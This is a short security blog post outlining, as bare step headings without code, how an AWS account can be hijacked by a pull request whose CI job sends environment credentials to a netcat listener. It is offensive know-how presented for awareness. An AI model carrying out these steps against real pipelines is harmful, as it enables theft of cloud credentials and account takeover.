AWS Account Hijacking via CI/CD

Jul 27, 2023


In the evolving landscape of cloud computing, AWS (Amazon Web Services) stands out as a leading service provider. However, as with any digital frontier, it is not without its potential vulnerabilities. One of the emerging threats faced by organizations today is CI/CD Security. In this short blog post I will show how the AWS Account Hijacking can be done via CI/CD.

IAM Configuration


External provider — ENV via NC

Start listener — grep for AWS

Push changes

Make PR

Job execution

Account Hijacked :)

You may download the PDF Presentation here.

See the full version in awesome video posted on the John Hammond channel.




MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Paysera..